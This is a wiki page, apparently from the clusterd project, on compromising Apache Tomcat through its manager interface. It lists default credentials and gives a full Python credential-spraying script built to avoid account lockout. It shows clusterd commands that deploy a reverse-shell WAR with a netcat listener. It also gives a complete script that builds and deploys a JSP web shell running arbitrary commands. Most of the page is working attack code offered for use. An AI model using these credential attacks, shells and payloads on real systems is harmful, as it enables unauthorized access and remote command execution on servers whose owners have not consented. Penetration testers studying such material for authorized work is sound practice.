Stephen Breen edited this page May 7, 2014 · 2 revisions

The Tomcat application server can be attacked through its management interface, usually found at /manager/ or /manager/html on port 8080. We attack Tomcat through known or easily guessable credentials on that interface. How insecure the defaults are varies by version, with a trend toward becoming more secure in later releases: recent versions ship with no enabled users in conf/tomcat-users.xml, so the manager is only usable once an administrator has added an account, and that account is where weak, guide-copied passwords come from.

Default Credentials

Some credentials to try on the Tomcat manager interface include the following:

tomcat/s3cret
tomcat/tomcat
admin/admin
tomcat/admin
admin/tomcat
admin/password
tomcat/password
admin/
tomcat/

Note that the username does not have to be "admin" or "tomcat", but it usually is: this is what most configuration guides use. Keep the list short per username, because Tomcat 7 and later wrap the user realm in a LockOutRealm by default, which locks an account for five minutes after five failed logins. A 401 means the pair was rejected; a 403 means the credentials are valid but the account lacks the role the interface needs (Tomcat 7 and later use manager-gui for the HTML interface and manager-script for the text interface), which is still worth knowing.
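The following script is an added example (not part of the original wiki page and not clusterd code) that tries the pairs listed above against a manager URL with HTTP Basic auth, stops at the first 200 or 403, and skips a username after four failures so the default LockOutRealm threshold of five is never reached. The target URL, the probe callable and the max_failures_per_user value are assumptions chosen for illustration; the network call is isolated in http_status so the spraying logic can also be exercised offline.

```python
import base64
import urllib.error
import urllib.request

# The credential pairs from the list above, as (username, password).
# "admin/" and "tomcat/" denote an empty password.
DEFAULT_CREDS = [
    ("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin"),
    ("tomcat", "admin"), ("admin", "tomcat"), ("admin", "password"),
    ("tomcat", "password"), ("admin", ""), ("tomcat", ""),
]


def basic_auth_header(user, password):
    """Build the HTTP Basic Authorization value the manager webapp expects."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def http_status(url, user, password, timeout=5):
    """GET url with Basic auth and return the HTTP status code (does network I/O)."""
    req = urllib.request.Request(
        url, headers={"Authorization": basic_auth_header(user, password)}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def classify(status):
    """Map the manager's status code to what it tells us about the credentials."""
    if status == 200:
        return "valid, account holds the manager role"
    if status == 403:
        return "valid, but account lacks the manager role for this interface"
    if status == 401:
        return "rejected"
    return f"unexpected status {status}"


def spray(manager_url, creds=DEFAULT_CREDS, probe=http_status, max_failures_per_user=4):
    """Try each pair in order and stop at the first 200 or 403.

    LockOutRealm (default in Tomcat 7+) locks a username after five failed
    logins, so a username is skipped once it has failed max_failures_per_user
    times (an assumed safety margin). Returns (hit, tried): hit is
    (user, password, status) or None; tried lists every pair with its status,
    or the string "skipped" for pairs not attempted.
    """
    failures = {}
    tried = []
    for user, password in creds:
        if failures.get(user, 0) >= max_failures_per_user:
            tried.append((user, password, "skipped"))
            continue
        status = probe(manager_url, user, password)
        tried.append((user, password, status))
        if status in (200, 403):
            return (user, password, status), tried
        failures[user] = failures.get(user, 0) + 1
    return None, tried


if __name__ == "__main__":
    import sys

    # Assumed target; pass your own manager URL as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080/manager/html"
    hit, tried = spray(target)
    for user, password, status in tried:
        print(f"{user}/{password}: {status if status == 'skipped' else classify(status)}")
    if hit:
        print("use:", hit[0], hit[1])
```

Run it as `python tomcat_spray.py http://host:8080/manager/html`. Because the probe is injectable, the same spray function can be pointed at /manager/text to find accounts that hold manager-script rather than manager-gui.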

Clusterd usage

If access can be gained to the Tomcat administrative interface, it is trivial to achieve remote command execution, assuming your account has the correct permissions (on Tomcat 7 and later, manager-gui for the HTML form and manager-script for the text interface). Again, clusterd can automate this process:

sudo python clusterd.py -o linux -i localhost -p 8080 -a tomcat --usr-auth tomcat:s3cret --deploy shell3.war --deployer manage_deploy --invoke

Note that in the above, shell3.war was generated on the attacker's machine with the clusterd command below. 127.0.0.1:4444 is the address the reverse shell connects back to, so substitute an IP and port the target can reach and have a listener waiting there (for example nc -lvp 4444) before running --invoke. Generate the payload with the -o value that matches the target's operating system.

sudo python clusterd.py -o windows -a tomcat --gen-payload 127.0.0.1:4444

Manually getting a shell

Performing the same attack manually is trivial. Browse to http://<host>:8080/manager/html, scroll down to the "Deploy" section and use the "WAR file to deploy" form to upload the WAR. Tomcat deploys and starts the new context automatically; then request the JSP inside it (this is what clusterd's --invoke does) and the reverse shell connects back to your listener.
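The script below is an added example (not part of the original page and not clusterd's code) that builds a minimal WAR in memory and deploys it without the browser. Two assumptions differ from the manual procedure above: it uses the manager's text interface (PUT /manager/text/deploy?path=..., which needs the manager-script role) instead of the HTML upload form, and the payload is a JSP that runs the value of a ?cmd= parameter and returns its output rather than a reverse shell. The context path /cmdshell, the file name cmd.jsp and the base URL are assumptions chosen for illustration.

```python
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Constructed payload: a JSP that executes ?cmd= and streams the process's stdout.
# Runtime.exec(String) splits on whitespace, so pipes and quoting need "sh -c '...'".
CMD_JSP = r"""<%@ page import="java.io.*" %><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    InputStream in = p.getInputStream();
    int b;
    while ((b = in.read()) != -1) { out.write(b); }
}
%>"""

# Minimal deployment descriptor; Tomcat does not validate it against the schema.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
</web-app>
"""


def build_war(jsp_name="cmd.jsp", jsp_source=CMD_JSP):
    """Return the bytes of a WAR (a zip) holding WEB-INF/web.xml and the JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML)
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the entry names of an in-memory WAR."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return z.namelist()


def war_entry(war_bytes, name):
    """Read one entry of an in-memory WAR."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return z.read(name)


def basic_auth(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_request(base_url, context_path, war_bytes, user, password):
    """Build the PUT that the manager text interface accepts for a WAR deploy."""
    url = (base_url.rstrip("/") + "/manager/text/deploy?"
           + urllib.parse.urlencode({"path": context_path}))
    headers = {
        "Authorization": basic_auth(user, password),
        "Content-Type": "application/octet-stream",
    }
    return urllib.request.Request(url, data=war_bytes, method="PUT", headers=headers)


def invoke_url(base_url, context_path, jsp_name, command):
    """URL that runs `command` through the deployed JSP."""
    return (f"{base_url.rstrip('/')}{context_path}/{jsp_name}?"
            + urllib.parse.urlencode({"cmd": command}))


def deploy_and_run(base_url, user, password, context_path="/cmdshell", command="id"):
    """Deploy the WAR, check the manager's text reply, then execute one command."""
    war = build_war()
    req = deploy_request(base_url, context_path, war, user, password)
    with urllib.request.urlopen(req, timeout=10) as resp:
        reply = resp.read().decode(errors="replace").strip()
    # The text interface answers "OK - Deployed application at context path ..."
    # on success and "FAIL - ..." otherwise.
    if not reply.startswith("OK"):
        raise RuntimeError("deploy failed: " + reply)
    with urllib.request.urlopen(invoke_url(base_url, context_path, "cmd.jsp", command),
                                timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    import sys

    # Usage: python tomcat_deploy.py http://host:8080 tomcat s3cret
    print(deploy_and_run(sys.argv[1], sys.argv[2], sys.argv[3]))
```

Undeploy with GET /manager/text/undeploy?path=/cmdshell when finished. If the account only holds manager-gui, the text interface returns 403 and you are back to the HTML form, which since Tomcat 7 also requires the CSRF nonce embedded in the page's form action.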
